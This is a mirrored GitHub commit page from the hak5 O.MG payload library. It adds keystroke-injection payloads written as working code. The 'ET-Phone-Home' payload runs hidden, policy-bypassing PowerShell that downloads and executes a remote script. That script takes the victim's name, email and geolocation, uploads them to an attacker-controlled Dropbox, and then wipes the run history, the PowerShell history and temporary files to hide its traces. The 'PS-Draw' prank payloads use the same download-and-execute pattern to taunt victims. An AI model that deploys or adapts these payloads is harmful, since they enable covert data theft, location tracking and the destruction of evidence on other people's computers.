hak5
/
omg-payloads
mirror of https://github.com/hak5/omg-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'hak5:master' into master

pull/36/head
UberGuidoZ 2022-04-28 14:28:15 -07:00 committed by GitHub
parent e328e3afba d4cc3b693c
commit 88593206e4
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
12 changed files with 866 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

14
payloads/library/incident_response/OMG-ET-Phone-Home/ET-Phone-Home-Execute.txt Normal file
View File

@ -0,0 +1,14 @@
REM this script will download and execute your locator script if your wifi access point is not detected
REM this script needs to be saved in the boot directory to have it run as soon as your device is plugged in
REM Replace SSID with name of wifi your computer is connected to
IF_NOT_PRESENT SSID="Home"
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https:// < Your Shared link for the intended file> ?dl=1; invoke-expression $pl
ENTER
REM Remember to replace the link with your DropBox shared link for the intended file to download
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly

151
payloads/library/incident_response/OMG-ET-Phone-Home/OMG-ET-Phone-Home.ps1 Normal file
View File

@ -0,0 +1,151 @@
############################################################################################################################################################
# | ___ _ _ _ # ,d88b.d88b #
# Title : OMG-ET-Phone-Home | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 #
# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' #
# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' #
# Category : Incident-Response | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' #
# Target : Windows 7,10,11 | |___/ # /\/|_ __/\\ #
# Mode : HID | |\__/,| (`\ # / -\ /- ~\ #
# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / #
# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo #
# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ #
#__________________________________|_________________________________________________________________________# | | ) ~ ( #
# # / \ / ~ \ #
# github.com/I-Am-Jakoby # \ / \~ ~/ #
# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_#
# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |#
# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |#
############################################################################################################################################################
<#
.SYNOPSIS
This script is meant to recover your device or as an advanced recon tactic to get sensitive info on your target
.DESCRIPTION
This program is used to locate your stolen cable. Or perhaps locate your "stolen" cable if you left it as bait.
This script will get the Name and email associated with the targets microsoft account
Their geo-location will also be grabbed giving you the latitude and longitude of where your device was activated
#>
#------------------------------------------------------------------------------------------------------------------------------------
$FileName = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_Device-Location.txt"
#------------------------------------------------------------------------------------------------------------------------------------
function Get-fullName {
try {
$fullName = Net User $Env:username | Select-String -Pattern "Full Name";$fullName = ("$fullName").TrimStart("Full Name")
}
# If no name is detected function will return $env:UserName
# Write Error is just for troubleshooting
catch {Write-Error "No name was detected"
return $env:UserName
-ErrorAction SilentlyContinue
}
return $fullName
}
$FN = Get-fullName
#------------------------------------------------------------------------------------------------------------------------------------
function Get-email {
try {
$email = GPRESULT -Z /USER $Env:username | Select-String -Pattern "([a-zA-Z0-9_\-\.]+)@([a-zA-Z0-9_\-\.]+)\.([a-zA-Z]{2,5})" -AllMatches;$email = ("$email").Trim()
return $email
}
# If no email is detected function will return backup message for sapi speak
# Write Error is just for troubleshooting
catch {Write-Error "An email was not found"
return "No Email Detected"
-ErrorAction SilentlyContinue
}
}
$EM = Get-email
#------------------------------------------------------------------------------------------------------------------------------------
function Get-GeoLocation{
try {
Add-Type -AssemblyName System.Device #Required to access System.Device.Location namespace
$GeoWatcher = New-Object System.Device.Location.GeoCoordinateWatcher #Create the required object
$GeoWatcher.Start() #Begin resolving current locaton
while (($GeoWatcher.Status -ne 'Ready') -and ($GeoWatcher.Permission -ne 'Denied')) {
Start-Sleep -Milliseconds 100 #Wait for discovery.
}
if ($GeoWatcher.Permission -eq 'Denied'){
Write-Error 'Access Denied for Location Information'
} else {
$GeoWatcher.Position.Location | Select Latitude,Longitude #Select the relevent results.
}
}
# Write Error is just for troubleshooting
catch {Write-Error "No coordinates found"
return "No Coordinates found"
-ErrorAction SilentlyContinue
}
}
$GL = Get-GeoLocation
#------------------------------------------------------------------------------------------------------------------------------------
echo $FN >> $env:TMP\$FileName
echo $EM >> $env:TMP\$FileName
echo $GL >> $env:TMP\$FileName
#------------------------------------------------------------------------------------------------------------------------------------
# Upload output file to dropbox
$DropBoxAccessToken = "YOUR-DROPBOX-ACCESS-TOKEN"
$TargetFilePath="/$FileName"
$SourceFilePath="$env:TMP\$FileName"
$arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }'
$authorization = "Bearer " + $DropBoxAccessToken
$headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
$headers.Add("Authorization", $authorization)
$headers.Add("Dropbox-API-Arg", $arg)
$headers.Add("Content-Type", 'application/octet-stream')
Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers
#------------------------------------------------------------------------------------------------------------------------------------
<#
.NOTES
This is to clean up behind you and remove any evidence to prove you were there
#>
# Delete contents of Temp folder
rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue
# Delete run box history
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
# Delete powershell history
Remove-Item (Get-PSreadlineOption).HistorySavePath
# Deletes contents of recycle bin
Clear-RecycleBin -Force -ErrorAction SilentlyContinue

128
payloads/library/incident_response/OMG-ET-Phone-Home/README.md Normal file
View File

@ -0,0 +1,128 @@
![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/OMG-AcidBurn/logo-170-px.png?raw=true)
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# OMG ET Phone Home
A script I put together to locate your stolen devices, or your "stolen" baited devices
## Description
This program is meant to locate your devices. Save the execution file on the boot partition of your devices and when someone plugs it into their computer
Using a one liner in the run box a script will be downloaded and executed that grabs the Name and email of the associated microsoft account and the
latitude and longitude of where the device was activated. This information is stored in a text document that is then uploaded to your dropbox.
Finally the end of the script will delete the runbox and powershell history and delete the files in the TMP Folder and Recycle Bin.
## Getting Started
### Dependencies
* DropBox - Your Shared link for the intended file
* Windows 7,10,11
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Your device is plugged into the targets computer
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory if your intended wifi network is not detected with the
geofencing options
```
powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https:// < Your Shared link for the intended file> ?dl=1; invoke-expression $pl
```
* The OMG device will attempt to detect the Wifi Access point you designated, if it does not..
* A one liner in the run box will download and execute the ET-Phone-Home Script
* This script will get the Name and Email associated with the microsoft account of the persons computer your device connected to
* The latitude and longitude of where the device was when it was activated will also be collected
* This gathered information will be saved to a text file in the TMP Directory
* That file will be uploaded to your DropBox cloud storage
Something Like What you see below will be in your cloud storage:
NAME
EMAIL
LATITUDE AND LONGITUDE
```
Jakoby
jakoby@example.com
Latitude Longitude
-------- ---------
37.778919 -122.416313
```
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here
I am Jakoby
Kalani
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<div><h2>I am Jakoby</h2></div>
<p><br/>
<img src="https://media.giphy.com/media/VgCDAzcKvsR6OM0uWg/giphy.gif" width="50">
<a href="https://github.com/I-Am-Jakoby/">
<img src="https://img.shields.io/badge/GitHub-I--Am--Jakoby-blue">
</a>
<a href="https://www.instagram.com/i_am_jakoby/">
<img src="https://img.shields.io/badge/Instagram-i__am__jakoby-red">
</a>
<a href="https://twitter.com/I_Am_Jakoby/">
<img src="https://img.shields.io/badge/Twitter-I__Am__Jakoby-blue">
</a>
<a href="https://www.youtube.com/c/IamJakoby/">
<img src="https://img.shields.io/badge/YouTube-I_am_Jakoby-red">
</a>
Project Link: [https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG-ET-Phone-Home)
</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [MG](https://github.com/OMG-MG)
<p align="right">(<a href="#top">back to top</a>)</p>

BIN
payloads/library/prank/OMG-PS-Draw/Images/PS-Draw.jpg Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 20 KiB

BIN
payloads/library/prank/OMG-PS-Draw/Images/omg-ico.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 383 B

BIN
payloads/library/prank/OMG-PS-Draw/Images/ps-colors.jpg Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 16 KiB

BIN
payloads/library/prank/OMG-PS-Draw/Images/ps-hak5.jpg Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 18 KiB

BIN
payloads/library/prank/OMG-PS-Draw/Images/ps-omg.jpg Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 11 KiB

232
payloads/library/prank/OMG-PS-Draw/PS-Custom-Draw.ps1 Normal file
View File

@ -0,0 +1,232 @@
############################################################################################################################################################
# | ___ _ _ _ # ,d88b.d88b #
# Title : OMG-PS-CustomDraw | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 #
# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' #
# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' #
# Category : Prank | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' #
# Target : Windows 7,10,11 | |___/ # /\/|_ __/\\ #
# Mode : HID | |\__/,| (`\ # / -\ /- ~\ #
# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / #
# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo #
# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ #
#__________________________________|_________________________________________________________________________# | | ) ~ ( #
# # / \ / ~ \ #
# github.com/I-Am-Jakoby # \ / \~ ~/ #
# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_#
# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |#
# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |#
############################################################################################################################################################
<#
.NOTES
This script uses the provided arrays to generate images. You also have the ability to make your own if you so choose.
To increase the size of the pixels add more spaces to the following Write-Host command.
Write-Host " " -NoNewline -BackgroundColor $Colors[$position]
.DESCRIPTION
This program will take the provided arrays and use them to generate images that will be drawn out in a powershell window.
.SYNTAX
$col | PS-Draw
$hak5 | PS-Draw
$omg | PS-Draw
PS-Draw -Image $col
PS-Draw -Image $hak5
PS-Draw -Image $omg
#>
############################################################################################################################################################
$Colors = @{
1 = 'White'
2 = 'Black'
3 = 'DarkBlue'
4 = 'DarkGreen'
5 = 'DarkCyan'
6 = 'DarkRed'
7 = 'DarkMagenta'
8 = 'DarkYellow'
9 = 'Gray'
10 = 'DarkGray'
11 = 'Blue'
12 = 'Green'
13 = 'Cyan'
14 = 'Red'
15 = 'Magenta'
16 = 'Yellow'
}
#Show available colors
$col = @(1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1),
@(2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2),
@(3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3),
@(4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4),
@(5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5),
@(6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6),
@(7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7),
@(8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8),
@(9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9),
@(10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10),
@(11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11),
@(12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12),
@(13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13,13),
@(14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14,14),
@(15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15,15),
@(16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16,16)
$omg = @(2,2,1,1,1,1,2,2,2,2,2,2,2,2,2,2,2,2,1,1,1,1),
@(2,2,2,1,1,1,1,2,2,2,2,2,2,2,2,2,2,1,1,1,1,2),
@(2,2,2,2,2,1,1,1,2,2,2,2,2,2,2,2,1,1,1,2,2,2),
@(2,2,2,2,2,1,1,1,2,2,2,2,2,2,2,2,1,1,1,2,2,2),
@(2,2,2,2,2,1,1,1,2,2,2,2,2,2,2,2,1,1,1,2,2,2),
@(2,2,2,2,1,1,1,1,2,2,2,2,2,2,2,2,1,1,1,1,2,2),
@(2,2,2,1,1,1,1,2,2,2,2,2,2,2,2,2,2,1,1,1,1,2),
@(2,2,1,1,1,1,2,2,2,2,2,2,2,2,2,2,2,2,1,1,1,1),
@(2,2,1,1,1,1,2,2,2,2,2,2,2,2,2,2,2,2,1,1,1,1),
@(2,2,1,1,1,1,2,2,2,1,1,1,1,1,1,2,2,2,1,1,1,1),
@(2,2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1),
@(2,2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1),
@(2,2,2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,2),
@(2,2,2,2,1,1,1,1,1,1,2,2,2,2,1,1,1,1,1,1,2,2),
@(2,2,2,2,1,1,1,1,1,2,2,2,2,2,2,1,1,1,1,1,2,2),
@(2,2,2,2,1,1,1,1,2,2,2,2,2,2,2,2,1,1,1,1,2,2),
@(2,2,2,2,1,1,1,1,2,2,2,2,2,2,2,2,1,1,1,1,2,2),
@(2,2,2,2,1,1,1,1,2,2,2,2,2,2,2,2,1,1,1,1,2,2),
@(2,2,2,2,1,1,1,1,2,2,2,2,2,2,2,2,1,1,1,1,2,2),
@(2,2,2,2,1,1,1,1,1,2,2,2,2,2,2,1,1,1,1,1,2,2),
@(2,2,2,2,1,1,1,1,1,1,2,2,2,2,1,1,1,1,1,1,2,2),
@(2,2,2,2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,2,2),
@(2,2,2,2,2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,2,2,2),
@(2,2,2,2,2,2,1,1,1,1,1,1,1,1,1,1,1,1,2,2,2,2),
@(2,2,2,2,2,2,2,2,2,1,1,1,1,1,1,2,2,2,2,2,2,2)
$hak5 = @(1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1),
@(1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1),
@(1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1),
@(1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,6,6,6,6,6,6,6,6,6,1),
@(1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,6,6,6,6,6,6,6,6,6,6,1),
@(1,1,1,1,1,1,1,1,1,1,1,2,2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,6,6,6,6,1,1,1,1,1,1,1),
@(1,2,2,1,1,1,1,1,1,1,1,2,2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,6,6,6,6,1,1,1,1,1,1,1),
@(1,2,2,1,1,1,1,1,1,1,1,2,2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,2,2,2,6,6,6,6,6,6,6,6,6,6,6,1),
@(1,2,2,1,1,1,1,1,1,1,1,2,2,1,1,1,1,2,2,2,1,1,1,2,2,1,1,1,2,2,1,6,6,6,6,6,6,6,6,6,6,6,1),
@(1,2,2,1,1,1,1,1,1,1,1,2,2,1,1,1,1,2,2,2,1,1,1,2,2,1,1,2,2,1,1,6,6,6,6,1,1,1,6,6,6,6,1),
@(1,2,2,1,1,1,1,1,1,1,1,2,2,1,1,1,2,2,2,2,1,1,1,2,2,2,2,2,1,1,1,6,6,6,1,1,1,1,6,6,6,6,1),
@(1,2,2,2,2,2,2,2,2,2,2,2,2,1,1,1,2,1,1,2,2,1,1,2,2,2,2,2,1,1,1,1,1,1,1,1,1,6,6,6,6,6,1),
@(1,2,2,2,2,2,2,2,2,2,2,2,2,1,1,2,2,1,1,2,2,1,1,2,2,1,1,2,2,1,1,1,1,1,1,1,1,6,6,6,6,6,1),
@(1,2,2,1,1,1,1,1,1,1,1,2,2,1,1,2,2,1,1,2,2,1,1,2,2,1,1,2,2,1,1,1,1,1,1,1,1,6,6,6,6,6,1),
@(1,2,2,1,1,1,1,1,1,1,1,2,2,1,1,2,2,2,2,2,2,2,1,2,2,1,1,1,2,6,6,6,6,6,1,1,6,6,6,6,6,1,1),
@(1,2,2,1,1,1,1,1,1,1,1,2,2,1,1,2,2,2,2,2,2,2,1,2,2,1,1,1,1,6,6,6,6,6,1,1,6,6,6,6,6,1,1),
@(1,2,2,1,1,1,1,1,1,1,1,2,2,2,2,2,1,1,1,1,2,2,2,2,2,1,1,1,1,6,6,6,6,6,1,1,6,6,6,6,1,1,1),
@(1,2,2,1,1,1,1,1,1,1,1,2,2,2,2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,6,6,6,6,6,6,6,6,6,6,6,1,1,1),
@(1,2,2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,6,6,6,6,6,6,6,6,6,6,1,1,1,1),
@(1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,6,6,6,6,6,6,6,1,1,1,1,1,1,1),
@(1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1)
# -------------------------------------------------------------------------------------------
function PS-Draw {
[CmdletBinding()]
param (
[Parameter (Mandatory = $True, ValueFromPipeline = $True)]
[Alias("I")]
[object[]]$Image
)
# if the data is sent through the pipeline, use $input to collect is as array
if ($PSCmdlet.MyInvocation.ExpectingInput) { $Image = @($input) }
#$Data | Out-String -Stream -Width 9999 | ForEach-Object { "$($_.Trim())`r`n" }
cls
foreach ($row in $Image) {
foreach ($position in $row) {
Write-Host " " -NoNewline -BackgroundColor $Colors[$position]
Start-Sleep -m 10
}
Write-Host ""
}
}
<#
.NOTES
This will get either the targets full name associated with the registered microsoft account
or it will default to grabbing the username of the account to use as a greeting for this script
#>
function Get-fullName {
try {
$fullName = Net User $Env:username | Select-String -Pattern "Full Name";$fullName = ("$fullName").TrimStart("Full Name")
}
# If no name is detected function will return $env:UserName
# Write Error is just for troubleshooting
catch {Write-Error "No name was detected"
return $env:UserName
-ErrorAction SilentlyContinue
}
return $fullName
}
# -------------------------------------------------------------------------------------------
# Get name to be used in greeting
cls
$fullName = Get-fullName
echo "Hello $fullName"
# -------------------------------------------------------------------------------------------
<#
.NOTES
Then the script will be paused until the mouse is moved
script will check mouse position every indicated number of seconds
This while loop will constantly check if the mouse has been moved
"CAPSLOCK" will be continously pressed to prevent screen from turning off
it will then sleep for the indicated number of seconds and check again
when mouse is moved it will break out of the loop and continue theipt
#>
Add-Type -AssemblyName System.Windows.Forms
$o=New-Object -ComObject WScript.Shell
$originalPOS = [System.Windows.Forms.Cursor]::Position.X
while (1) {
$pauseTime = 3
if ([Windows.Forms.Cursor]::Position.X -ne $originalPOS){
break
}
else {
$o.SendKeys("{CAPSLOCK}");Start-Sleep -Seconds $pauseTime
}
}
<#
.NOTES
This is where you call the function to draw out one of the images above
$col - to see the available colors you can use for a custom image
$hak5 - this will draw out the hak5 five logo
$omg - this will draw out the omg logo
#>
# -------------------------------------------------------------------------------------------
# Call function with one of the arrays listed above to generate an image
$hak5 | PS-Draw

9
payloads/library/prank/OMG-PS-Draw/PS-Draw-Execute Normal file
View File

@ -0,0 +1,9 @@
REM Remember to replace the link with your DropBox shared link for the intended file to download
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly
REM Download one of the two PS-Draw Execute files provided and execute it
GUI r
DELAY 500
STRING powershell -NoExit -Exec Bypass $pl = iwr https:// < Your Shared link for the intended file> ?dl=1; invoke-expression $pl
ENTER

201
payloads/library/prank/OMG-PS-Draw/PS-Draw.ps1 Normal file
View File

@ -0,0 +1,201 @@
############################################################################################################################################################
# | ___ _ _ _ # ,d88b.d88b #
# Title : OMG-PS-Draw | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 #
# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' #
# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' #
# Category : Prank | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' #
# Target : Windows 7,10,11 | |___/ # /\/|_ __/\\ #
# Mode : HID | |\__/,| (`\ # / -\ /- ~\ #
# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / #
# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo #
# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ #
#__________________________________|_________________________________________________________________________# | | ) ~ ( #
# # / \ / ~ \ #
# github.com/I-Am-Jakoby # \ / \~ ~/ #
# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_#
# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |#
# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |#
############################################################################################################################################################
<#
.NOTES
This script will convert an approximation of what your image should look like. Most likely you'll need to test several images to find one that works
well. It is best to use images no larger than 150x150 pixels, but I would even recommend going smaller than that. My exmaple image is 25x20 pixels
To increase the size of the pixels add more spaces to the following Write-Host command.
Write-Host " " -NoNewline -BackgroundColor $BackGround
.DESCRIPTION
This program will take the path of an image you provide and convert it to a Bitmap file. An algorithm will be used to calculate the closest console color
that can be used in powershell. Finally that image will be drawn in a powershell window.
.SYNTAX
"$env:TMP\omg-ico.png" | PS-Draw
PS-Draw -Path "$env:TMP\omg-ico.png"
#>
############################################################################################################################################################
Function PS-Draw
{
param(
[String] [parameter(mandatory=$true, Valuefrompipeline = $true)] $Path,
[Switch] $ToASCII
)
Begin
{
[void] [System.Reflection.Assembly]::LoadWithPartialName('System.drawing')
# Console Colors and their Hexadecimal values
$Colors = @{
'FFFFFFFF' = 'White'
'FF000000' = 'Black'
'FF000080' = 'DarkBlue'
'FF008000' = 'DarkGreen'
'FF008080' = 'DarkCyan'
'FF800000' = 'DarkRed'
'FF800080' = 'DarkMagenta'
'FF808000' = 'DarkYellow'
'FFC0C0C0' = 'Gray'
'FF808080' = 'DarkGray'
'FF0000FF' = 'Blue'
'FF00FF00' = 'Green'
'FF00FFFF' = 'Cyan'
'FFFF0000' = 'Red'
'FFFF00FF' = 'Magenta'
'FFFFFF00' = 'Yellow'
}
# Algorithm to calculate closest Console color (Only 16) to a color of Pixel
Function Get-ClosestConsoleColor($PixelColor)
{
($(foreach ($item in $Colors.Keys) {
[pscustomobject]@{
'Color' = $Item
'Diff' = [math]::abs([convert]::ToInt32($Item,16) - [convert]::ToInt32($PixelColor,16))
}
}) | Sort-Object Diff)[0].color
}
}
Process
{
Foreach($item in $Path)
{
#Convert Image to BitMap
$BitMap = [System.Drawing.Bitmap]::FromFile((Get-Item $Item).fullname)
Foreach($y in (1..($BitMap.Height-1)))
{
Foreach($x in (1..($BitMap.Width-1)))
{
$Pixel = $BitMap.GetPixel($X,$Y)
$BackGround = $Colors.Item((Get-ClosestConsoleColor $Pixel.name))
If($ToASCII) # Condition to check ToASCII switch
{
Write-Host "$([Char](Get-Random -Maximum 126 -Minimum 33))" -NoNewline -ForegroundColor $BackGround
}
else
{
Write-Host " " -NoNewline -BackgroundColor $BackGround
}
}
Write-Host '' # Blank write-host to Start the next row
}
}
}
end
{
}
}
<#
.NOTES
This will get either the targets full name associated with the registered microsoft account
or it will default to grabbing the username of the account to use as a greeting for this script
#>
function Get-fullName {
try {
$fullName = Net User $Env:username | Select-String -Pattern "Full Name";$fullName = ("$fullName").TrimStart("Full Name")
}
# If no name is detected function will return $env:UserName
# Write Error is just for troubleshooting
catch {Write-Error "No name was detected"
return $env:UserName
-ErrorAction SilentlyContinue
}
return $fullName
}
# -------------------------------------------------------------------------------------------
# Download the image from wherever you are hosting it
iwr https://www.dropbox.com/s/EXAMPLE/omg-ico.png?dl=1 -O $env:TMP\omg-ico.png
# -------------------------------------------------------------------------------------------
# Get name to use in the greeting
cls
$fullName = Get-fullName
echo "Hello $fullName"
# -------------------------------------------------------------------------------------------
<#
.NOTES
Then the script will be paused until the mouse is moved
script will check mouse position every indicated number of seconds
This while loop will constantly check if the mouse has been moved
"CAPSLOCK" will be continously pressed to prevent screen from turning off
it will then sleep for the indicated number of seconds and check again
when mouse is moved it will break out of the loop and continue theipt
#>
Add-Type -AssemblyName System.Windows.Forms
$o=New-Object -ComObject WScript.Shell
$originalPOS = [System.Windows.Forms.Cursor]::Position.X
while (1) {
$pauseTime = 3
if ([Windows.Forms.Cursor]::Position.X -ne $originalPOS){
break
}
else {
$o.SendKeys("{CAPSLOCK}");Start-Sleep -Seconds $pauseTime
}
}
<#
.NOTES
This is where you call the function to draw out your image
Replace the path below with the path of your image
.SYNTAX
"$env:TMP\omg-ico.png" | PS-Draw
PS-Draw -Path "$env:TMP\omg-ico.png"
#>
# -------------------------------------------------------------------------------------------
# Call the function with the image you'd like to have drawn here
"$env:TMP\omg-ico.png" | PS-Draw

131
payloads/library/prank/OMG-PS-Draw/README.md Normal file
View File

@ -0,0 +1,131 @@
![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/OMG-AcidBurn/logo-170-px.png?raw=true)
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# OMG PS-Draw
A script used to generate and draw images in the Powershell Window, used to leave a signature or perhaps taunt victims
## Description
These two programs use two different method to draw out images in the Powershell Window.
PS-Draw will convert an image you download into a BMP file estiamte the used colors based off the 16 available powershell colors
then draw your image out in the powershell window. This process is not exact and needed testing of multiple images to find one that works well.
PS-Custom-Draw generates images to be drawn in the Powershell Window based off pre-configured arrays I put together already included in the file itself.
These images look significantly cleaner due to the fact they were drawn and coded specifically for this purpose.
After the images are generated, a greeting will be generated by grabbing either the name associated with the registered microsoft account or the
UserName environment variable.
The script will then be paused until a mouse movement is detected at which time the pre selected image will be drawn out in the powershell window.
## Getting Started
### Dependencies
* DropBox or another image hosting service - Your Shared link for the intended file
* Windows 10,11
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in OMG Device
* Invoke-WebRequest will be used to download the image
```
powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https:// < Your Shared link for the intended file> ?dl=1
```
* The image will be converted into a BMP file
* An algorithm will be used to find the closest matching colors available in the powershell window
* The image will be generated in the powershell window
This is an example of an image I used with the PS-Draw command
![alt text](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/OMG-PS-Draw/Images/omg-ico.png)
This is how the iamge is interpreted and drawn out
![alt text](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/OMG-PS-Draw/Images/PS-Draw.jpg)
* The PS-Custom-Draw operates a little differently
* One of the preconfigured arrays is piped into the command to generate an image
